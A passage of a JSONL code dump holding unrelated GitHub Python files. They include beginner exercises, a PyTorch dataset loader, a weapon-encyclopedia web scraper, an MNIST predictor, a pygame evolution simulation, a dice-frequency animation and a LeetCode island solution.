response\n","repo_name":"PedroSMarcal/Hackaton2021","sub_path":"backend/utils/ProblemTypeUtil.py","file_name":"ProblemTypeUtil.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13495748046","text":"# Cities\n# 1st example\nprompt = \"\\nPlease enter the name of a city you have visited: \"\nprompt += \"\\n(Enter 'quit' when you are finished.) \"\nwhile True:\n    cidade = str(input(prompt))\n    if cidade == 'quit':\n        break\n    else:\n        print(f\"I'd love to go to {cidade.title()}!\")\n\n# 2nd example\nwhile True:\n    cidade = str(input('Please enter the name of a city you have visited: ')) # noqa\n    if cidade == 'quit':\n        break\n    else:\n        print(f\"I'd love to go to {cidade.title()}!\\n\")\n        print(\"Enter 'quit' when you are finished.\")\n","repo_name":"JenaCarry/Curso-Intesensivo-Python","sub_path":"capitulo_7/cidades.py","file_name":"cidades.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9848503569","text":"import os\nimport random\nimport json\nimport torch\nimport torch.nn as nn\n\nfrom collections import namedtuple\n\n# Can simply be regarded as an object, called \"Batch\", having attributes \"input\" and \"target\"\nBatch = namedtuple('Batch', 'input target')\n\nclass Dataset(): \n\n    def __init__(self, raw_train_file, train_file, dev_file, test_file, word_to_idx, use_gpu=False):\n        # word_to_idx/tag_to_idx: both are functions that map a string to an int\n        self.num_classes = 10\n        self.use_gpu = use_gpu\n\n        self.train_file = train_file\n        self.dev_file = dev_file\n        self.test_file = test_file\n\n        # Shuffle trainset\n        self.shuffle_trainset(raw_train_file, train_file)\n\n        self.word_to_idx = word_to_idx\n\n        self.num_train_samples = 0\n        for batch in self.trainset(batch_size=1000):\n            self.num_train_samples += batch[0].shape[0]\n\n        self.num_dev_samples = 0\n        for batch in self.devset(batch_size=1000):\n            self.num_dev_samples += batch[0].shape[0]\n\n        self.num_test_samples = 0\n        for batch in self.testset(batch_size=1000):\n            self.num_test_samples += batch[0].shape[0]\n\n    def shuffle_trainset(self, raw_file, out_file):\n\n        if 
os.path.exists(out_file):\n print ('Trainset has been shuffled, do not shuffle.')\n return \n\n lines = []\n with open(raw_file, 'r') as f:\n lines = f.readlines()\n random.shuffle(lines)\n with open(out_file, 'w') as f:\n for line in lines:\n f.write(line)\n \n\n def trainset(self, batch_size=1, drop_last=False):\n for batch in self.sample_batches(self.train_file, batch_size=batch_size, drop_last=drop_last):\n yield batch\n \n def devset(self, batch_size=1, drop_last=False):\n for batch in self.sample_batches(self.dev_file, batch_size=batch_size, drop_last=drop_last):\n yield batch\n\n def testset(self, batch_size=1, drop_last=False):\n for batch in self.sample_batches(self.test_file, batch_size=batch_size, drop_last=drop_last):\n yield batch\n\n def tag_to_idx(self, t):\n t2i = {'体育': 0, '财经': 1, '房产': 2, '家居': 3, '教育': 4, '科技': 5, '时尚': 6, '时政': 7, '游戏': 8, '娱乐': 9}\n return t2i[t]\n\n def sentence_to_tensor(self, s):\n # s: string or list\n # return: 1-d long tensor of shape (seq_len)\n return torch.LongTensor([self.word_to_idx(w) for w in s])\n\n def pad_sequence(self, s):\n # TODO pad to 512?\n return nn.utils.rnn.pad_sequence(s, batch_first=True)\n\n # TODO preprocess string\n def samples(self, file_path):\n\n with open(file_path, 'r') as f:\n for line in f:\n tag, sent = line.strip().split('\\t')\n # print (tag, sent)\n # input ()\n\n sent = self.sentence_to_tensor(sent)\n tag = torch.LongTensor([self.tag_to_idx(tag)])\n\n if self.use_gpu: \n yield sent.cuda(), tag.cuda()\n else: \n yield sent, tag\n \n \n def sample_batches(self, file_path, batch_size=1, drop_last=False):\n # drop_last: drop the last incomplete batch if True\n cnt = 0\n\n # Input and target\n sent_batch, tag_batch = [], [] # (batch_size, seq_len), (batch_size)\n\n for sent, tag in self.samples(file_path):\n # all tensor-like\n\n sent_batch.append(sent)\n tag_batch.append(tag)\n\n cnt += 1\n if cnt >= batch_size:\n\n yield Batch(input=self.pad_sequence(sent_batch), target=torch.cat(tag_batch))\n sent_batch, tag_batch = [], []\n cnt = 0\n\n if cnt > 0 and not drop_last:\n yield Batch(input=self.pad_sequence(sent_batch), target=torch.cat(tag_batch))\n\n\n\n\nif __name__ == '__main__': \n # Usage\n raw_train_file = 'cnews/cnews.train.txt'\n train_file = 'cnews/cnews.train.shuffled.txt'\n dev_file = 'cnews/cnews.val.txt'\n test_file = 'cnews/cnews.test.txt'\n\n def word_to_idx(w):\n w2i = {'当': 1, '希': 2}\n return w2i.get(w, 0)\n\n dataset = Dataset(raw_train_file=raw_train_file, train_file=train_file, dev_file=dev_file, test_file=test_file, word_to_idx=word_to_idx)\n\n print (f'trainset: {dataset.num_train_samples}')\n print (f'devset: {dataset.num_dev_samples}')\n print (f'testset: {dataset.num_test_samples}')\n\n cnt = 0\n for sent_batch, tag_batch in dataset.trainset(batch_size=10, drop_last=False):\n # print (f'sent_batch: {sent_batch.shape}, tag_batch: {tag_batch.shape}')\n # input ()\n cnt += sent_batch.shape[0]\n print (f'trainset: {cnt}')\n \n cnt = 0\n for sent_batch, tag_batch in dataset.devset(batch_size=10, drop_last=False):\n # print (f'sent_batch: {sent_batch.shape}, tag_batch: {tag_batch.shape}')\n # input ()\n cnt += sent_batch.shape[0]\n print (f'devset: {cnt}')\n\n cnt = 0\n for sent_batch, tag_batch in dataset.testset(batch_size=10, drop_last=False):\n # print (f'sent_batch: {sent_batch.shape}, tag_batch: {tag_batch.shape}')\n # input ()\n cnt += sent_batch.shape[0]\n print (f'testset: 
{cnt}')\n\n","repo_name":"Hongqin-Li/NTFS","sub_path":"data/thucnews/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30792405010","text":"import os\nimport socket\nimport string\nimport threading\nimport time\nimport urllib.request\nimport urllib.error\nimport requests\nimport xlrd\nfrom bs4 import BeautifulSoup\nimport pymongo\nfrom common_function import clear_char\n\nTAG_URL_OF_WEAPON = 'url_of_weapon'\nTAG_URL_OF_CACHE = 'url_of_cache'\nBASE_URL = 'http://weapon.huanqiu.com'\nclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\ndb = client[\"huanqiu\"]\n\n\n# db.create_collection('key_url')\n\n\n# col = db[\"key_url\"]\ndef request_url(url):\n data = requests.get(url)\n # col = db[\"cache_url\"]\n # source = col.find_one({'url': url})\n # if source:\n # return source['source']\n # else:\n # print(url)\n # col.insert_one({\n # 'tag': TAG_URL_OF_CACHE,\n # 'url': url,\n # 'source': data.text\n # })\n return data.text\n\n\n# def insert_urlofweapon():\n# col = db[\"key_url\"]\n# col.insert_one({\n# 'tag': TAG_URL_OF_WEAPON,\n# 'url': url\n# 'name': name\n# })\n\n\ndef get_weapon_url(source, keyname):\n # col = db[\"key_url\"]\n soup = BeautifulSoup(source, 'html.parser')\n li = soup.find('li', class_=\"img\")\n url = li.find('a').get('href')\n url = BASE_URL + url\n # if col.find_one({'name': keyname}):\n # col.replace_one(\n # {'name': keyname},\n # {\n # 'tag': TAG_URL_OF_WEAPON,\n # 'url': url,\n # 'name': keyname\n # })\n # else:\n # col.insert_one({\n # 'tag': TAG_URL_OF_WEAPON,\n # 'url': url,\n # 'name': keyname\n # })\n\n\ndef get_weapon_info(keyname,source):\n # data_info=''\n #\n # col = db[\"key_url\"]\n # result = col.find_one({'name': keyname})\n # if col.find_one({'name': keyname}):\n\n soup = BeautifulSoup(source, 'html.parser')\n li = soup.find('li', class_=\"img\")\n url = li.find('a').get('href')\n url = BASE_URL + url\n \n # url = result['url']\n source = request_url(url)\n soup = BeautifulSoup(source, 'html.parser')\n data_info = soup.find('div', class_='dataInfo')\n data_info = data_info.text\n try:\n intron = soup.find('div', class_='intron')\n intron = intron.text\n info = soup.find('div', class_='info')\n info = info.text\n except Exception as e:\n info = ''\n intron = ''\n print(e)\n with open('dirlist', 'r', encoding='utf8') as f_r:\n dirs_lines = f_r.readlines()\n for l in dirs_lines:\n if keyname in l:\n dirname = '../' + l.strip('\\n')\n with open(dirname + '/info.txt', 'a',encoding='utf8') as f:\n f.write(data_info)\n f.write(info)\n f.write(intron)\n try:\n img = soup.find('div', class_=\"maxPic\")\n img = img.find('img').get('src')\n res = requests.get(img)\n res.raw.decode_content = True\n print(img)\n\n if res.status_code == 200:\n # str(random.randint(0, 9999))\n with open(dirname + os.sep + '0001' + '.jpg', 'wb') as image_f:\n image_f.write(res.content)\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n xls_file = '../../cfg/list.xlsx'\n wb = xlrd.open_workbook(xls_file)\n sheet = wb.sheet_by_index(0)\n for irow in range(5212,sheet.nrows):\n print(irow)\n c_row = sheet.row(irow)\n # A = c_row[0].value\n # B = c_row[1].value\n # C = c_row[2].value\n D = c_row[3].value\n # A = clear_char(A)\n # B = clear_char(B)\n # C = clear_char(C)\n D = clear_char(D)\n print(D)\n # keyname = 'C-295中程预警机'\n keyname = D\n search_url = 'http://weapon.huanqiu.com/search?keyword='\n url = 
'http://weapon.huanqiu.com/search?keyword=' + keyname\n keyname = clear_char(keyname)\n\n # data=request_url(url)\n # query = {\"tag\":TAG_URL_OF_WEAPON}\n # col.delete_many(query)\n try:\n source = request_url(url)\n # print(source)\n # get_weapon_url(source, keyname)\n get_weapon_info(keyname,source)\n # print(request_url('http://weapon.huanqiu.com/c_295'))\n except:\n continue\n","repo_name":"superxiaotutu/worm","sub_path":"python_worm/huanqiu/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19835435225","text":"import cv2\r\nimport torch\r\nimport numpy as np\r\nfrom matplotlib import cm\r\nimport torch.nn.functional as F\r\nimport torch.nn as nn\r\n\r\nclass MnistModel(nn.Module):\r\n \"\"\"Feedfoward neural network with 1 hidden layer\"\"\"\r\n def __init__(self, in_size, hidden_size, out_size):\r\n super().__init__()\r\n # hidden layer\r\n self.linear1 = nn.Linear(in_size, hidden_size)\r\n # output layer\r\n self.linear2 = nn.Linear(hidden_size, out_size)\r\n \r\n def forward(self, xb):\r\n # Flatten the image tensors\r\n xb = xb.view(xb.size(0), -1)\r\n # Get intermediate outputs using hidden layer\r\n out = self.linear1(xb)\r\n # Apply activation function\r\n out = F.relu(out)\r\n # Get predictions using output layer\r\n out = self.linear2(out)\r\n return out\r\n \r\n def training_step(self, batch):\r\n images, labels = batch \r\n out = self(images) # Generate predictions\r\n loss = F.cross_entropy(out, labels) # Calculate loss\r\n return loss\r\n \r\n def validation_step(self, batch):\r\n images, labels = batch \r\n out = self(images) # Generate predictions\r\n loss = F.cross_entropy(out, labels) # Calculate loss\r\n acc = accuracy(out, labels) # Calculate accuracy\r\n return {'val_loss': loss, 'val_acc': acc}\r\n \r\n def validation_epoch_end(self, outputs):\r\n batch_losses = [x['val_loss'] for x in outputs]\r\n epoch_loss = torch.stack(batch_losses).mean() # Combine losses\r\n batch_accs = [x['val_acc'] for x in outputs]\r\n epoch_acc = torch.stack(batch_accs).mean() # Combine accuracies\r\n return {'val_loss': epoch_loss.item(), 'val_acc': epoch_acc.item()}\r\n \r\n def epoch_end(self, epoch, result):\r\n print(\"Epoch [{}], val_loss: {:.4f}, val_acc: {:.4f}\".format(epoch, result['val_loss'], result['val_acc']))\r\n\r\ndef accuracy(outputs, labels):\r\n _, preds = torch.max(outputs, dim=1)\r\n return torch.tensor(torch.sum(preds == labels).item() / len(preds))\r\n\r\ninput_size = 784\r\nhidden_size = 32 # you can change this\r\nnum_classes = 10\r\n\r\nmodel = MnistModel(input_size, hidden_size=32, out_size=num_classes)\r\nmodel.load_state_dict(torch.load('digit/digit.pth'))\r\nmodel.eval()\r\n\r\ndef predict_image(img, model):\r\n xb = img.unsqueeze(0)\r\n yb = model(xb)\r\n _, preds = torch.max(yb, dim=1)\r\n return preds[0].item()\r\n\r\nfrom PIL import Image\r\nimport torchvision.transforms as transforms\r\n\r\nimage = cv2.imread('digit/images/test3.png')\r\n\r\ntransform = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Resize((28, 28))])\r\n \r\nimg_tensor = transform(image)\r\nimg_tensor = img_tensor[0:1, :, :]\r\nprint(img_tensor.shape)\r\nprint('Predicted:', predict_image(img_tensor, 
model))","repo_name":"Infi-09/Doctor-Prescripton-Handwritten-Recoginition","sub_path":"digit/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"71898236712","text":"import random\r\nprint('===== DESAFIO 19 =====')\r\n# Um professor quer sortear um dos seus quatro alunos para apagar o quadro.\r\n# Faça um programa que ajude ele, lendo o nome deles e escrevendo o nome do escolhido.\r\nalunos = input('\\nDigite o nome dos 4 alunos separados por um espaço: ')\r\nalunos_list = alunos.split()\r\n\r\nfor i in range(4):\r\n alunos_list[i] = str(alunos_list[i])\r\n\r\n# print('\\nAlunos incluídos na lista: {}'.format(alunos_list))\r\nprint('Aluno selecionado: {}'.format(random.choice(alunos_list)))\r\n","repo_name":"carolasouza/Curso-em-Video---Python","sub_path":"Mundo 01/exercicios/ex019a.py","file_name":"ex019a.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1377429952","text":"import importlib.util\nfrom PySide2.QtWidgets import (\n QWidget, QDialog, QDialogButtonBox, QLabel, QLineEdit, QHBoxLayout, QVBoxLayout, QFrame\n)\nimport symba_gui as package\nfrom .editor import Editor\n\n\nclass ChartEditor(QDialog):\n def __init__(self, parent=None, title=None, code=None):\n super().__init__(parent=parent)\n self.setWindowTitle(\"Chart Editor\")\n\n self.wtitle = QLineEdit(title or \"Untitled Chart\")\n self.wcode = Editor()\n self.wcode.setLanguage(\"python\")\n\n if code is None:\n with open(package.dir / \"data/default_chart.py\", \"r\", encoding=\"utf-8\") as f:\n code = f.read()\n \n self.wcode.setText(code)\n\n wcode_frame = QFrame()\n wcode_frame.setFrameShape(wcode_frame.Box)\n wcode_frame.setFrameShadow(wcode_frame.Sunken)\n lycode_frame = QHBoxLayout()\n lycode_frame.setContentsMargins(0, 0, 0, 0)\n wcode_frame.setLayout(lycode_frame)\n lycode_frame.addWidget(self.wcode)\n\n lytitle_container = QHBoxLayout()\n lytitle_container.setContentsMargins(0, 0, 0, 0)\n\n lytitle_container.addWidget(QLabel(\"Chart title:\"))\n lytitle_container.addWidget(self.wtitle)\n\n button_box = QDialogButtonBox(QDialogButtonBox.Save | QDialogButtonBox.Cancel)\n self.wbutton_save = button_box.button(QDialogButtonBox.Save)\n self.wbutton_cancel = button_box.button(QDialogButtonBox.Cancel)\n\n self.wbutton_save.clicked.connect(self.accept)\n self.wbutton_cancel.clicked.connect(self.reject)\n\n line = QFrame()\n line.setFrameShape(QFrame.HLine)\n line.setFrameShadow(QFrame.Sunken)\n\n ly = QVBoxLayout()\n self.setLayout(ly)\n\n ly.addLayout(lytitle_container)\n ly.addWidget(wcode_frame)\n ly.addWidget(line)\n ly.addWidget(button_box)\n \n @property\n def title(self):\n return self.wtitle.text()\n \n @title.setter\n def title(self, text):\n self.wtitle.setText(text)\n \n @property\n def code(self):\n return self.wcode.text()\n \n @code.setter\n def code(self, text):\n self.wcode.setText(text)\n\n\nclass Chart(QWidget):\n \"\"\"A user-made chart that loads from a python file.\"\"\"\n def __init__(self, output_dir, path):\n super().__init__()\n self.output_dir = output_dir\n self.path = path\n self.title = path.stem\n self.wchart = QWidget() # Initialized later in reload()\n\n ly = QVBoxLayout()\n self.setLayout(ly)\n ly.addWidget(self.wchart)\n\n self._editor = None\n\n self.reload()\n\n def reload(self, path=None):\n self.path = path or self.path\n \n 
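# Drop the old chart widget before re-importing the module from disk, so edits\n        # saved by the editor take effect without restarting the application.\n        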
self.layout().removeWidget(self.wchart)\n\n        # Import the module and call chart() function\n        spec = importlib.util.spec_from_file_location(self.title, self.path)\n        module = importlib.util.module_from_spec(spec)\n        spec.loader.exec_module(module)\n        self.wchart = module.chart(str(self.output_dir))\n\n        self.layout().addWidget(self.wchart)\n\n    def editor(self):\n        \"\"\"Return an editor that is linked to this chart.\"\"\"\n        with open(self.path, \"r\", encoding=\"utf-8\") as f:\n            code = f.read()\n        \n        if self._editor is None:\n            self._editor = ChartEditor(self)\n\n            def done(result):\n                if not result:\n                    return # User cancelled\n\n                title = self._editor.title\n                code = self._editor.code\n\n                self.path.unlink()\n                self.path = self.path.parent / (title + \".py\")\n\n                with open(self.path, \"w\", encoding=\"utf-8\") as f:\n                    f.write(code)\n\n                self.reload()\n            \n            self._editor.finished.connect(done)\n        \n        self._editor.title = self.title\n        self._editor.code = code\n        \n        return self._editor\n","repo_name":"johannlussange/symba-gui","sub_path":"symba_gui/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"15160196219","text":"def main():\r\n    n, k = map(int, input().split())\r\n    tt = [int(input()) for _ in range(n)]\r\n    for i in range(2, n):\r\n        if tt[i] + tt[i - 1] + tt[i - 2] < k:\r\n            print(i + 1)\r\n            return\r\n    print(-1)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc036/A/4902666.py","file_name":"4902666.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"}
+{"seq_id":"71891980392","text":"from collections import deque\r\nimport sys\r\nN = int(sys.stdin.readline())\r\n# N = int(input())\r\n\r\n# card 1 sits on top of the deck (the last index)\r\nlst = list(range(1, N+1))\r\nlst = deque(lst)\r\n# repeat until only two cards remain \r\nwhile len(lst) > 2: \r\n    # discard the topmost card \r\n    lst.popleft()\r\n    # move the next card on top to the bottom of the deck \r\n    lst.append(lst.popleft())\r\n\r\nprint(lst[-1])","repo_name":"data-sign/algorithm","sub_path":"백준/Unrated/2164. 
카드2/카드2.py","file_name":"카드2.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"35437618144","text":"import sys, random\nimport pygame\nfrom pygame.locals import *\nimport pymunk\nimport pymunk.pygame_util\n\nfrom Obstacle import Obstacle\nfrom Creature import Creature\n\n# handles game functionality, including colision and evolution management\nclass Overlord:\n\tdef __init__(self, screen, space, draw_options, display_x, display_y, epsilon, population_size=10, simulation_step=0.1, epochs=1000):\n\n\t\t# screen we are drawing on\n\t\tself.screen = screen\n\n\t\t# simulation space\n\t\tself.space = space\n\n\t\t# used for easy drawing of all simulation objects\n\t\tself.draw_options = draw_options\n\n\t\t# width and height of the screen for the fitness test and side bar\n\t\tself.fitness_display_x, self.fitness_display_y = 0.9*display_x, display_y\n\t\tself.sidebar_display_x, self.sidebar_display_y = 0.1*display_x, display_y\n\t\tself.sidebar_display_start_x = self.fitness_display_x\n\n\t\t#the zone in which creatures can be instantiated\n\t\tself.creation_bounds = self.make_creation_bounds() \n\n\t\t# all living creatures\n\t\tself.population_size = population_size\n\n\t\t# the number of steps in the simulation we advance after each iteration\n\t\tself.simulation_step = simulation_step\n\n\t\t# populate creatures\n\t\tself.creatures = []\n\t\tfor i in range(self.population_size):\n\t\t\tc = Creature(self.creation_bounds)\n\t\t\tself.creatures.append(c)\n\n\t\t# sidebar creatures\n\t\tself.sidebar_creatures = self.populate_sidebar()\n\n\t\t# mutation rate for creatures\n\t\tself.epsilon = epsilon\n\n\t\t# all static obstacles\n\t\tself.obstacles = self.obstacle_set_1()\n\n\t\t# variables used for each generation, this includes fitness scores and current creatures indices\n\t\tself.epoch = 0\n\t\tself.current_creature_ind = 0\n\t\tself.fitness_scores = [None for x in range(self.population_size)]\n\n\t# builds the zone in which creatures can be instantiated\n\tdef make_creation_bounds(self):\n\t\treturn [0.05*self.fitness_display_x, 0.95*self.fitness_display_x, 0.9*self.fitness_display_y, self.fitness_display_y]\n\n\t# displays all the creatures in the population as static objects in the sidebar\n\tdef populate_sidebar(self, refresh=False):\n\n\t\tif refresh:\n\t\t\tself.clear_sidebar()\n\n\t\t# calculate the starting x position and the separation between each sidebar object on the y axis\n\t\tcreature_separation = (0.9*self.sidebar_display_y) / max(1,len(self.creatures))\n\t\tx = self.sidebar_display_start_x + self.sidebar_display_x / 2\n\n\t\t# list of objects in the sidebar\n\t\tsidebar_creatures = []\n\n\t\t# make each creature as a static object in the sidebar\n\t\tcount = 1\n\t\tfor c in self.creatures:\n\t\t\tob = Obstacle(c.vertices, (x,self.sidebar_display_y - creature_separation*count), self.space)\n\t\t\tsidebar_creatures.append(ob)\n\t\t\tcount += 1\n\n\t\treturn sidebar_creatures\n\n\t# removes all objects in the sidebar\n\tdef clear_sidebar(self):\n\t\tfor ob in self.sidebar_creatures:\n\t\t\tself.space.remove(ob.shape,ob.shape.body)\n\n\t# test a creature in the population\n\t#TODO: update the population\n\tdef test_creatures(self):\n\n\t\tcurrent_creature = self.creatures[self.current_creature_ind]\n\n\t\tif current_creature.shape == None:\n\t\t\tcurrent_creature.build_creature(self.space)\n\n\t\tif not 
current_creature.in_space:\n\t\t\tcurrent_creature.add_to_space(self.space)\n\n\t\t# update the creature's lowest y-value and time of making it there.\n\t\t# if the creature is greater than or equal to the specified species age,\n\t\t# this constitutes a completed life_cycle, which will be a value of either\n\t\t# 1 or 0. When a life cycle is completed, the creature dies and score is recorded\n\t\tlife_cycle = current_creature.update(self.simulation_step)\n\n\t\t# if life cycle is complete (== 1), record best scores for the creature and select the next creature\n\t\tif life_cycle == 1:\n\t\t\tself.fitness_scores[self.current_creature_ind] = (current_creature.lowest_y, current_creature.time_of_low_point)\n\t\t\tself.remove_creature_from_space(current_creature)\n\t\t\tself.current_creature_ind += 1\n\n\t\t\tif self.current_creature_ind >= self.population_size:\n\t\t\t\tself.update_population()\n\t\t\t\tself.epoch += 1\n\n\t\t\t\n\n\n\tdef update_population(self):\n\n\t\tzip_list = zip(self.fitness_scores,self.creatures)\n\n\t\t# calculate 2 best and 1 worst member of the population\n\t\tsorted_scores = []\n\t\tfor i in range(self.population_size):\n\t\t\tfitness_rating = self.calculate_fitness_rating(self.fitness_scores[i])\n\t\t\tsorted_scores.append((fitness_rating,self.creatures[i]))\n\n\t\t# sort scores by fitness rating in descending order\n\t\tsorted_scores.sort(key=lambda t:t[0],reverse=True)\n\n\t\t# delete worst 2 members\n\t\tsorted_scores.pop()\n\t\tsorted_scores.pop()\n\n\t\t# breed 2 best and add child to population\n\t\tp1 = sorted_scores[0][1]\n\t\tp2 = sorted_scores[1][1]\n\t\tnew_creature = Creature(self.creation_bounds,[p1,p2],self.epsilon)\n\t\tself.creatures = [new_creature]\n\t\t\n\t\tfor v in sorted_scores:\n\t\t\tself.creatures.append(v[1])\n\n\t\t# add a completely random member to the population\n\t\tself.creatures.append(Creature(self.creation_bounds))\n\n\t\t# repopulate sidebar with new population\n\t\tself.sidebar_creatures = self.populate_sidebar(refresh=True)\n\n\t\t#reset all creature metadta\n\t\tfor c in self.creatures:\n\t\t\tc.reset()\n\n\t\t#reset current creature index for next iteration\n\t\tself.current_creature_ind = 0\n\n\t# given a tuple of a creature's fitness scores, calculate an arbitrary rating value of the performance\n\tdef calculate_fitness_rating(self,tup):\n\t\treturn 1 / tup[0]\n\t\n\tdef print_population_scores(self):\n\t\tprint(\"########## Epoch: {} ##########\".format(self.epoch))\n\t\tfor i in range(self.population_size):\n\t\t\tprint(\"Creature: {}\".format(i))\n\t\t\tprint(\"\\t Lowest point: {}\".format(self.fitness_scores[i][0]))\n\t\t\tprint(\"\\t Time: {}\\n\".format(self.fitness_scores[i][1]))\n\n\n\t# remove the specified creature from the game space.\n\tdef remove_creature_from_space(self, creature):\n\t\tself.space.remove(creature.shape,creature.shape.body)\n\t\tcreature.in_space = 0\n\n\n\tdef update(self):\n\t\t# wipe the screen\n\t\tself.screen.fill((255,255,255))\n\n\t\t# test a creature. 
Once a creature has completed testing, the next creature will be tested.\n\t\t# after all creatures have been tested, the epoch ends, the population is updated, and we repeat\n\t\tself.test_creatures()\n\t\t\n\t\t# draw all objects attatched to the space\n\t\tself.space.debug_draw(self.draw_options)\n\n\t\t# increment the simulation by one step\n\t\tfor i in range(1000):\n\t\t\tself.space.step(self.simulation_step/10.0)\n\n\t\t# set the display to the current buffered display\n\t\tpygame.display.flip()\n\n\tdef obstacle_set_1(self):\n\n\t\tlw_p = (0,0)\n\t\tlw_v = [(0, 0), (0.01*self.fitness_display_x,0), (0.01*self.fitness_display_x, self.fitness_display_y), (0, self.fitness_display_y)]\n\t\tlw = Obstacle(lw_v, lw_p, space=self.space)\n\n\t\trw_p = (0.99*self.fitness_display_x,0)\n\t\trw_v = [(0, 0), (0.01*self.fitness_display_x,0), (0.01*self.fitness_display_x, self.fitness_display_y), (0, self.fitness_display_y)]\n\t\trw = Obstacle(rw_v, rw_p, space=self.space)\n\n\t\tbot_p = (0,0)\n\t\tbot_v = [(0,0),(self.fitness_display_x, 0), (self.fitness_display_x,0.01*self.fitness_display_y), (0, 0.01*self.fitness_display_y)]\n\t\tbot = Obstacle(bot_v, bot_p, space = self.space)\n\n\t\tp1 = (0.5*self.fitness_display_x,0)\n\t\tv1 = [(0,0.8*self.fitness_display_y),(0,0.7*self.fitness_display_y), (0.5*self.fitness_display_x,0.7*self.fitness_display_y)]\n\t\tob1 = Obstacle(v1,p1,space=self.space)\n\n\t\tp2 = (0.5*self.fitness_display_x,0)\n\t\tv2 = [(0,0.8*self.fitness_display_y),(0,0.7*self.fitness_display_y), (-0.3*self.fitness_display_x,0.7*self.fitness_display_y)]\n\t\tob2 = Obstacle(v2,p2,space=self.space)\n\n\t\tp3 = (0,0)\n\t\tv3 = [(0,0.7*self.fitness_display_y),(0,0.55*self.fitness_display_y), (0.8*self.fitness_display_x,0.565*self.fitness_display_y), (0.8*self.fitness_display_x,0.57*self.fitness_display_y)]\n\t\tob3 = Obstacle(v3,p3,space=self.space)\n\n\t\tp4 = (0.5*self.fitness_display_x,0)\n\t\tv4 = [(0.5*self.fitness_display_x,0.54*self.fitness_display_y),(0.5*self.fitness_display_x,0.45*self.fitness_display_y), (-0.4*self.fitness_display_x,0.40*self.fitness_display_y)]\n\t\tob4 = Obstacle(v4,p4,space=self.space)\n\n\t\treturn [lw, rw, bot, ob1, ob2, ob3, ob4]\n","repo_name":"Richard-Hansen/EvolutionaryShapes","sub_path":"Overlord.py","file_name":"Overlord.py","file_ext":"py","file_size_in_byte":7944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14832097007","text":"# Roll Die Dynamic\n\"\"\"Dynamically graphing frequencies of die rolls\"\"\"\n\nfrom matplotlib import animation\nimport matplotlib.pyplot as plt\nimport random\nimport seaborn as sns\nimport sys\n\n\ndef update(frame_number, rolls, faces, frequencies):\n \"\"\"Configures bar plot contents foeach animation frame.\"\"\"\n # roll die and update frequencies\n for _ in range(rolls):\n frequencies[random.randrange(1, 7) - 1] += 1\n \n # reconfigure plot for updated die frequencies\n plt.cla() # clear old contents of current Figure\n axes = sns.barplot(faces, frequencies, palette='bright') # new bars\n axes.set_title(f'Die Frequencies for {sum(frequencies):,} Rolls')\n axes.set(xlabel='Die Value', ylabel='Frequency')\n axes.set_ylim(top=max(frequencies) * 1.10) # scale y-axis by 10%\n\n # display frequency & percentage above each patch (bar)\n for bar, frequency in zip(axes.patches, frequencies):\n text_x = bar.get_x() + bar.get_width() / 2.0\n text_y = bar.get_height()\n text = f'{frequency:,}\\n{frequency / sum(frequencies):.3%}'\n axes.text(text_x, text_y, text, 
ha='center', va='bottom')\n\n# read command-line arguments for number of frames and rolls per frame\nnumber_of_frames = int(sys.argv[1])\nrolls_per_frame = int(sys.argv[2])\n\nsns.set_style('whitegrid') # white background with gray grid lines\nfigure = plt.figure('Rolling Six-Sided Die') # figure for animation\nvalues = list(range(1, 7)) # die favces for display on x-axis\nfrequencies = [0] * 6 # six - element list of die frequencies\n\n# configure and start animation that calls function update\ndie_animation = animation.FuncAnimation(figure, update, repeat=False, frames=number_of_frames, interval=33,\n fargs=(rolls_per_frame, values, frequencies))\n\nplt.show() # display window","repo_name":"cpoles/data_science","sub_path":"machine_learning/deitel/dicts_sets/roll_die_dynamic.py","file_name":"roll_die_dynamic.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"33941727797","text":"#foarte asemanatoare cu number of islands \n# doar ca in loc sa incrementam un contor in momentul in care gasim o insula, \n# numaram fiecare parcela din insula respectiva si vedem care e cea mai mare\n\ndef dfs(grid, i, j):\n if i<0 or j<0 or i>=len(grid) or j>=len(grid[0]) or grid[i][j]!=1: return 0\n grid[i][j] = 0\n return 1+dfs(grid,i+1,j)+dfs(grid,i,j+1)+dfs(grid,i-1,j)+dfs(grid,i,j-1)\n\nclass Solution:\n def maxAreaOfIsland(self, grid: List[List[int]]) -> int:\n\n if not grid: return 0\n max = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n k = dfs(grid,i,j)\n if k > max: max = k\n return 